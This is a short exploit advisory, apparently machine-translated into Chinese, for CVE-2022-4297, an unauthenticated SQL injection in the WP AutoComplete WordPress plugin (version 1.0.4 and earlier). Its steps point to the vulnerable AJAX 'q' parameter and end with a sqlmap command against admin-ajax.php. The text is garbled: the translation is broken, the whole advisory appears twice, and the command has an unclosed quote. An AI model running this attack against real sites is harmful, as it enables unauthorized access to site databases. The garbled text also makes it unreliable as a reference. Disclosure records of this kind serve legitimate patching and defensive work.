#利用标题: WP AutoComplete 1.0.4-未经身份验证的SQLI
#日期: 30/06/2023
#利用作者: Matin Nouriyan(Matitanium)
#版本:=1.0.4
#CVE: CVE-2022-4297
供应商homepage: https://wordpress.org/support/plugin/wp-autosearch/
#在: Kali Linux上测试
-----------------------------------------------------
WP自动完成搜索WordPress插件通过1.0.4不消毒
并在通过未经身份验证的用户可用的AJAX中使用该参数之前逃脱参数之前
导致未经身心的SQL注入
------------------------------------------------------
如何重现此漏洞:
1。安装WP自动完成=1.0.4
2。wp autocomplete=1.0.4使用q参数for ajax请求
3。查找请求属于wp autocomplete,例如步骤5
4。启动SQLMAP并利用
5。python3 sqlmap.py -u'https://example.com/wp-admin/admin-ajax.php?q=[yourSearch]
#日期: 30/06/2023
#利用作者: Matin Nouriyan(Matitanium)
#版本:=1.0.4
#CVE: CVE-2022-4297
供应商homepage: https://wordpress.org/support/plugin/wp-autosearch/
#在: Kali Linux上测试
-----------------------------------------------------
WP自动完成搜索WordPress插件通过1.0.4不消毒
并在通过未经身份验证的用户可用的AJAX中使用该参数之前逃脱参数之前
导致未经身心的SQL注入
------------------------------------------------------
如何重现此漏洞:
1。安装WP自动完成=1.0.4
2。wp autocomplete=1.0.4使用q参数for ajax请求
3。查找请求属于wp autocomplete,例如步骤5
4。启动SQLMAP并利用
5。python3 sqlmap.py -u'https://example.com/wp-admin/admin-ajax.php?q=[yourSearch]